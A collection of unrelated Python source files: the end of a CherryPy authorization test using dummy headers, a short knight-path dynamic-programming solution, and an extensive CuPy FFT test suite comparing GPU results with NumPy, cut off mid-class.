self.assertStatus("200 OK")
self.assertBody("foo")
def test_auth_fail(self):
self.getPage("/test/global_admin", headers = self.h)
self.assertStatus("403 Forbidden")
def test_auth_success(self):
self.getPage("/test/global_admin", headers = self.hglobal)
self.assertStatus("200 OK")
self.assertBody("ok")
class AuthTest(webtest.WebCase, cherrypy.Tool):
def setUp(self):
cherrypy.Tool.__init__(self, 'before_request_body', user_info_from_headers, priority=60)
webtest.WebCase.PORT = PORT
self.engine = cherrypy.engine
self.proc = load_server(self.engine)
def tearDown(self):
print("teardown")
stop_server(self.proc, self.engine)
def testAuth(self):
myHeaders = [('cms-authn-name', 'Blah'), ('cms-auth-status', 'OK'),
('cms-authn-login', 'blah'), ('cms-authn-hmac', '1234')]
self.getPage("/test", headers=myHeaders)
self.assertTrue(True) # Do not remove this line! otherwise the test hangs
def setup_server():
srcfile = __file__.split("/")[-1].split(".py")[0]
setup_dummy_server(srcfile, "Root", authz_key_file=FAKE_FILE, port=PORT)
def load_server(engine):
setup_server()
proc = Process(target=start_server, name="cherrypy_Api_t", args=(engine,))
proc.start()
proc.join(timeout=1)
return proc
def start_server(engine):
webtest.WebCase.PORT = PORT
cherrypy.log.screen = True
engine.start()
engine.block()
def stop_server(proc, engine):
cherrypy.log.screen = True
engine.stop()
proc.terminate()
if __name__ == '__main__':
webtest.main()
|
lab12_d.py
|
from sys import setrecursionlimit
import threading
setrecursionlimit(10 ** 9)
threading.stack_size(3 * 67108864)
def main():
def cover():
nonlocal i, j
while i >= 0 and j >= 0 and j < m:
moves = 0
for step in [[1, -2], [-2, 1], [-1, -2], [-2, -1]]:
di, dj = step[0] + i, step[1] + j
if di in range(n) and dj in range(m) and matrix[di][dj] > 0:
moves += matrix[di][dj]
matrix[i][j] += moves
i -= 1
j += 1
file_input, file_output = open('knight2.in', 'r'), open('knight2.out','w')
n, m = map(int, file_input.readline().split())
matrix = [[0] * m for _ in range(n)]
matrix[0][0] = 1
for diff in range(n):
i, j = diff, 0
cover()
for diff in range(1, m):
i, j = n - 1, diff
cover()
print(matrix[-1][-1], file=file_output)
file_output.close()
thread = threading.Thread(target=main)
thread.start()
|
test_fft.py
|
import functools
import numpy as np
import pytest
import cupy
from cupy.fft import config
from cupy.fft._fft import (_default_fft_func, _fft, _fftn,
_size_last_transform_axis)
from cupy import testing
from cupy.testing._loops import _wraps_partial
@pytest.fixture
def skip_forward_backward(request):
if request.instance.norm in ('backward', 'forward'):
if not (np.lib.NumpyVersion(np.__version__) >= '1.20.0'):
pytest.skip('forward/backward is supported by NumPy 1.20+')
def nd_planning_states(states=[True, False], name='enable_nd'):
"""Decorator for parameterized tests with and wihout nd planning
Tests are repeated with config.enable_nd_planning set to True and False
Args:
states(list of bool): The boolean cases to test.
name(str): Argument name to which specified dtypes are passed.
This decorator adds a keyword argument specified by ``name``
to the test fixture. Then, it runs the fixtures in parallel
by passing the each element of ``dtypes`` to the named
argument.
"""
def decorator(impl):
@_wraps_partial(impl, name)
def test_func(self, *args, **kw):
# get original global planning state
planning_state = config.enable_nd_planning
try:
for nd_planning in states:
try:
# enable or disable nd planning
config.enable_nd_planning = nd_planning
kw[name] = nd_planning
impl(self, *args, **kw)
except Exception:
print(name, 'is', nd_planning)
raise
finally:
# restore original global planning state
config.enable_nd_planning = planning_state
return test_func
return decorator
def multi_gpu_config(gpu_configs=None):
"""Decorator for parameterized tests with different GPU configurations.
Args:
gpu_configs (list of list): The GPUs to test.
.. notes:
The decorated tests are skipped if no or only one GPU is available.
"""
def decorator(impl):
@functools.wraps(impl)
def test_func(self, *args, **kw):
use_multi_gpus = config.use_multi_gpus
_devices = config._devices
try:
for gpus in gpu_configs:
try:
nGPUs = len(gpus)
assert nGPUs >= 2, 'Must use at least two gpus'
config.use_multi_gpus = True
config.set_cufft_gpus(gpus)
self.gpus = gpus
impl(self, *args, **kw)
except Exception:
print('GPU config is:', gpus)
raise
finally:
config.use_multi_gpus = use_multi_gpus
config._devices = _devices
del self.gpus
return test_func
return decorator
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*testing.product({
'n': [None, 0, 5, 10, 15],
'shape': [(0,), (10, 0), (10,), (10, 10)],
'norm': [None, 'backward', 'ortho', 'forward', ''],
}))
@testing.gpu
class TestFft:
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft always returns np.complex128
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
# NumPy 1.17.0 and 1.17.1 raises ZeroDivisonError due to a bug
@testing.with_requires('numpy!=1.17.0')
@testing.with_requires('numpy!=1.17.1')
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(*testing.product({
'shape': [(0, 10), (10, 0, 10), (10, 10), (10, 5, 10)],
'data_order': ['F', 'C'],
'axis': [0, 1, -1],
}))
@testing.gpu
class TestFftOrder:
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.fft(a, axis=self.axis)
# np.fft.fft always returns np.complex128
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.ifft(a, axis=self.axis)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
# See #3757 and NVIDIA internal ticket 3093094
def _skip_multi_gpu_bug(shape, gpus):
# avoid CUDA 11.0 (will be fixed by CUDA 11.2) bug triggered by
# - batch = 1
# - gpus = [1, 0]
if (11000 <= cupy.cuda.runtime.runtimeGetVersion() < 11020
and len(shape) == 1
and gpus == [1, 0]):
pytest.skip('avoid CUDA 11 bug')
# Almost identical to the TestFft class, except that
# 1. multi-GPU cuFFT is used
# 2. the tested parameter combinations are adjusted to meet the requirements
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*testing.product({
'n': [None, 0, 64],
'shape': [(0,), (0, 10), (64,), (4, 64)],
'norm': [None, 'backward', 'ortho', 'forward', ''],
}))
@testing.multi_gpu(2)
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='hipFFT does not support multi-GPU FFT')
class TestMultiGpuFft:
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
_skip_multi_gpu_bug(self.shape, self.gpus)
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(dtype)
return out
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
# NumPy 1.17.0 and 1.17.1 raises ZeroDivisonError due to a bug
@testing.with_requires('numpy!=1.17.0')
@testing.with_requires('numpy!=1.17.1')
def test_ifft(self, xp, dtype):
_skip_multi_gpu_bug(self.shape, self.gpus)
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
# np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(dtype)
return out
# Almost identical to the TestFftOrder class, except that
# 1. multi-GPU cuFFT is used
# 2. the tested parameter combinations are adjusted to meet the requirements
@testing.parameterize(*testing.product({
'shape': [(10, 10), (10, 5, 10)],
'data_order': ['F', 'C'],
'axis': [0, 1, -1],
}))
@testing.multi_gpu(2)
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='hipFFT does not support multi-GPU FFT')
class TestMultiGpuFftOrder:
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
_skip_multi_gpu_bug(self.shape, self.gpus)
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.fft(a, axis=self.axis)
# np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(dtype)
return out
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
_skip_multi_gpu_bug(self.shape, self.gpus)
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.ifft(a, axis=self.axis)
# np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(dtype)
return out
@testing.gpu
class TestDefaultPlanType:
@nd_planning_states()
def test_default_fft_func(self, enable_nd):
# test cases where nd cuFFT plan is possible
ca = cupy.ones((16, 16, 16))
for axes in [(0, 1), (1, 2), None, (0, 1, 2)]:
fft_func = _default_fft_func(ca, axes=axes)
if enable_nd:
# TODO(leofang): test newer ROCm versions
if axes == (0, 1) and cupy.cuda.runtime.is_hip:
assert fft_func is _fft
else:
assert fft_func is _fftn
else:
assert fft_func is _fft
# only a single axis is transformed -> 1d plan preferred
for axes in [(0, ), (1, ), (2, )]:
assert _default_fft_func(ca, axes=axes) is _fft
# non-contiguous axes -> nd plan not possible
assert _default_fft_func(ca, axes=(0, 2)) is _fft
# >3 axes transformed -> nd plan not possible
ca = cupy.ones((2, 4, 6, 8))
assert _default_fft_func(ca) is _fft
# first or last axis not included -> nd plan not possible
assert _default_fft_func(ca, axes=(1, )) is _fft
# for rfftn
ca = cupy.random.random((4, 2, 6))
for s, axes in zip([(3, 4), None, (8, 7, 5)],
[(-2, -1), (0, 1), None]):
fft_func = _default_fft_func(ca, s=s, axes=axes, value_type='R2C')
if enable_nd:
# TODO(leofang): test newer ROCm versions
if axes == (0, 1) and cupy.cuda.runtime.is_hip:
assert fft_func is _fft
else:
assert fft_func is _fftn
else:
assert fft_func is _fft
# nd plan not possible if last axis is not 0 or ndim-1
assert _default_fft_func(ca, axes=(2, 1), value_type='R2C') is _fft
# for irfftn
ca = cupy.random.random((4, 2, 6)).astype(cupy.complex128)
for s, axes in zip([(3, 4), None, (8, 7, 5)],
[(-2, -1), (0, 1), None]):
fft_func = _default_fft_func(ca, s=s, axes=axes, value_type='C2R')
if enable_nd:
# To get around hipFFT's bug, we don't use PlanNd for C2R
# TODO(leofang): test newer ROCm versions
if cupy.cuda.runtime.is_hip:
assert fft_func is _fft
else:
assert fft_func is _fftn
else:
assert fft_func is _fft
# nd plan not possible if last axis is not 0 or ndim-1
assert _default_fft_func(ca, axes=(2, 1), value_type='C2R') is _fft
@pytest.mark.skipif(10010 <= cupy.cuda.runtime.runtimeGetVersion() <= 11010,
reason='avoid a cuFFT bug (cupy/cupy#3777)')
@testing.gpu
@testing.slow
class TestFftAllocate:
def test_fft_allocate(self):
# Check CuFFTError is not raised when the GPU memory is enough.
# See https://github.com/cupy/cupy/issues/1063
# TODO(mizuno): Simplify "a" after memory compaction is implemented.
a = []
for i in range(10):
a.append(cupy.empty(100000000))
del a
b = cupy.empty(100000007, dtype=cupy.float32)
cupy.fft.fft(b)
# Free huge memory for slow test
del b
cupy.get_default_memory_pool().free_all_blocks()
# Clean up FFT plan cache
cupy.fft.config.clear_plan_cache()
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*(
testing.product_dict([
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': (1, None), 'axes': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1)},
{'shape': (3, 4), 's': None, 'axes': (-1, -2)},
{'shape': (3, 4), 's': None, 'axes': (0,)},
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': None, 'axes': ()},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1)},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3)},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1)},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': ()},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2)},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None},
{'shape': (0, 5), 's': None, 'axes': None},
{'shape': (2, 0, 5), 's': None, 'axes': None},
{'shape': (0, 0, 5), 's': None, 'axes': None},
{'shape': (3, 4), 's': (0, 5), 'axes': None},
{'shape': (3, 4), 's': (1, 0), 'axes': None},
],
testing.product({'norm': [None, 'backward', 'ortho', 'forward', '']})
)
))
@testing.gpu
class TestFft2:
@nd_planning_states()
@testing.for_orders('CF')
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft2(self, xp, dtype, order, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.fft2(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_orders('CF')
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft2(self, xp, dtype, order, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.ifft2(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*(
testing.product_dict([
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': (1, None), 'axes': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1)},
{'shape': (3, 4), 's': None, 'axes': (-1, -2)},
{'shape': (3, 4), 's': None, 'axes': [-1, -2]},
{'shape': (3, 4), 's': None, 'axes': (0,)},
{'shape': (3, 4), 's': None, 'axes': ()},
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1)},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3)},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -3)},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1)},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': ()},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2)},
{'shape': (2, 3, 4), 's': (4, 3, 2), 'axes': (2, 0, 1)},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None},
{'shape': (0, 5), 's': None, 'axes': None},
{'shape': (2, 0, 5), 's': None, 'axes': None},
{'shape': (0, 0, 5), 's': None, 'axes': None},
],
testing.product({'norm': [None, 'backward', 'ortho', 'forward', '']})
)
))
@testing.gpu
class TestFftn:
@nd_planning_states()
@testing.for_orders('CF')
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fftn(self, xp, dtype, order, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_orders('CF')
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifftn(self, xp, dtype, order, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*(
testing.product_dict([
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1)},
{'shape': (3, 4), 's': None, 'axes': (-1, -2)},
{'shape': (3, 4), 's': None, 'axes': (0,)},
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1)},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3)},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1)},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': None},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2)},
{'shape': (0, 5), 's': None, 'axes': None},
{'shape': (2, 0, 5), 's': None, 'axes': None},
{'shape': (0, 0, 5), 's': None, 'axes': None},
],
testing.product({'norm': [None, 'backward', 'ortho', 'forward']})
)
))
@testing.gpu
class TestPlanCtxManagerFftn:
@pytest.fixture(autouse=True)
def skip_buggy(self):
if cupy.cuda.runtime.is_hip:
# TODO(leofang): test newer ROCm versions
if (self.axes == (0, 1) and self.shape == (2, 3, 4)):
pytest.skip("hipFFT's PlanNd for this case "
"is buggy, so Plan1d is generated "
"instead")
@nd_planning_states()
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes)
with plan:
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes)
with plan:
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_complex_dtypes()
def test_fftn_error_on_wrong_plan(self, dtype, enable_nd):
if 0 in self.shape:
pytest.skip('0 in shape')
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fftn
assert config.enable_nd_planning == enable_nd
# can't get a plan, so skip
if self.axes is not None:
if self.s is not None:
if len(self.s) != len(self.axes):
return
elif len(self.shape) != len(self.axes):
return
a = testing.shaped_random(self.shape, cupy, dtype)
bad_in_shape = tuple(2*i for i in self.shape)
if self.s is None:
bad_out_shape = bad_in_shape
else:
bad_out_shape = tuple(2*i for i in self.s)
b = testing.shaped_random(bad_in_shape, cupy, dtype)
plan_wrong = get_fft_plan(b, bad_out_shape, self.axes)
with pytest.raises(ValueError) as ex, plan_wrong:
fftn(a, s=self.s, axes=self.axes, norm=self.norm)
# targeting a particular error
assert 'The cuFFT plan and a.shape do not match' in str(ex.value)
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), ],
'norm': [None, 'backward', 'ortho', 'forward'],
}))
@testing.gpu
class TestPlanCtxManagerFft:
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
def test_fft_error_on_wrong_plan(self, dtype):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fft
a = testing.shaped_random(self.shape, cupy, dtype)
bad_shape = tuple(5*i for i in self.shape)
b = testing.shaped_random(bad_shape, cupy, dtype)
plan_wrong = get_fft_plan(b)
assert isinstance(plan_wrong, cupy.cuda.cufft.Plan1d)
with pytest.raises(ValueError) as ex, plan_wrong:
fft(a, n=self.n, norm=self.norm)
# targeting a particular error
assert 'Target array size does not match the plan.' in str(ex.value)
# Almost identical to the TestPlanCtxManagerFft class, except that
# 1. multi-GPU cuFFT is used
# 2. the tested parameter combinations are adjusted to meet the requirements
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*testing.product({
'n': [None, 64],
'shape': [(64,), (128,)],
'norm': [None, 'backward', 'ortho', 'forward', ''],
}))
@testing.multi_gpu(2)
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='hipFFT does not support multi-GPU FFT')
class TestMultiGpuPlanCtxManagerFft:
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
_skip_multi_gpu_bug(self.shape, self.gpus)
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
_skip_multi_gpu_bug(self.shape, self.gpus)
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
def test_fft_error_on_wrong_plan(self, dtype):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fft
a = testing.shaped_random(self.shape, cupy, dtype)
bad_shape = tuple(4*i for i in self.shape)
b = testing.shaped_random(bad_shape, cupy, dtype)
plan_wrong = get_fft_plan(b)
assert isinstance(plan_wrong, cupy.cuda.cufft.Plan1d)
with pytest.raises(ValueError) as ex, plan_wrong:
fft(a, n=self.n, norm=self.norm)
# targeting a particular error
if self.norm == '':
# if norm is invalid, we still get ValueError, but it's raised
# when checking norm, earlier than the plan check
return # skip
assert 'Target array size does not match the plan.' in str(ex.value)
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*(
testing.product_dict([
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1)},
{'shape': (3, 4), 's': None, 'axes': (-1, -2)},
{'shape': (3, 4), 's': None, 'axes': (0,)},
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1)},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3)},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1)},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4, 5), 's': None, 'axes': (-3, -2, -1)},
],
testing.product({'norm': [None, 'backward', 'ortho', 'forward', '']})
)
))
@testing.gpu
class TestFftnContiguity:
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_fftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.fftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes)
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
assert out.flags.c_contiguous == a.flags.c_contiguous
assert out.flags.f_contiguous == a.flags.f_contiguous
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_ifftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.ifftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes)
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
assert out.flags.c_contiguous == a.flags.c_contiguous
assert out.flags.f_contiguous == a.flags.f_contiguous
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'backward', 'ortho', 'forward', ''],
}))
@testing.gpu
class TestRfft:
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,)],
'norm': [None, 'backward', 'ortho', 'forward'],
}))
@testing.gpu
class TestPlanCtxManagerRfft:
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
